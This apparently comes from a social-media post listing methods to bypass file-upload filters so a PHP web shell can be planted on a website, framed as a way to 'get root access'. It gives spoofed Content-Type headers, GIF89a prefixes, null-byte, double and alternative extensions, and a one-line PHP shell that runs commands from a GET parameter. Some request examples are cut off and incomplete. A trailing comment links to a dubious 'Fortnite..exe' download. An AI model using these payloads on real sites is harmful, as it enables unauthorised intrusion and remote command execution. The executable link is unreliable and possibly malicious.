Bypass File Upload methods
Shayan Akbari
Head & founding father Of AHRAR Universal Organization - Origin and founder Of Universalism - On a Mission to build the World's largest Organization. ? t.me/AOrgan | Saoshyan.Org ? The Future is Here ?
How to upload php shell on the site and get root access?
- use BurpSuite for all this
1. Change the ContentType
Content-Type: application/x-php
```
Change the Content-Type
```
2. Try to change the extension when send the request, for example in here you cant upload file with ext php but you can upload jpg file
```
POST /images/upload/ HTTP/1.1
Host: target.com
[...]
Content-Disposition: form-data; name="uploaded"; filename="dapos.php.jpg"
Content-Type: application/x-php
```
Change the request to this
```
POST /images/upload/ HTTP/1.1
Host: target.com
[...]
3. Upload the payload, but start with GIF89a; and
```
POST /images/upload/ HTTP/1.1
Host: target.com
[...]
And dont forget to change the content-type to image/gif
4. Bypass content length validation, it can be bypassed using small payload
```
(<?=`$_GET[x]`?>)
```
5. Using null byte in filename
```
file.php%00.gif
```
6. Using double extensions for the uploaded file
```
file.jpg.php
```
7. Uploading an unpopular php extensions (php4,php5,php6,phtml)
```
file.php5
```
8. Try to randomly capitalizes the file extension
```
file.pHP5
```
9. Mix the tips!
Student at saoft
10 个月https://fhscript.com/file/LNU/Fortnite..exe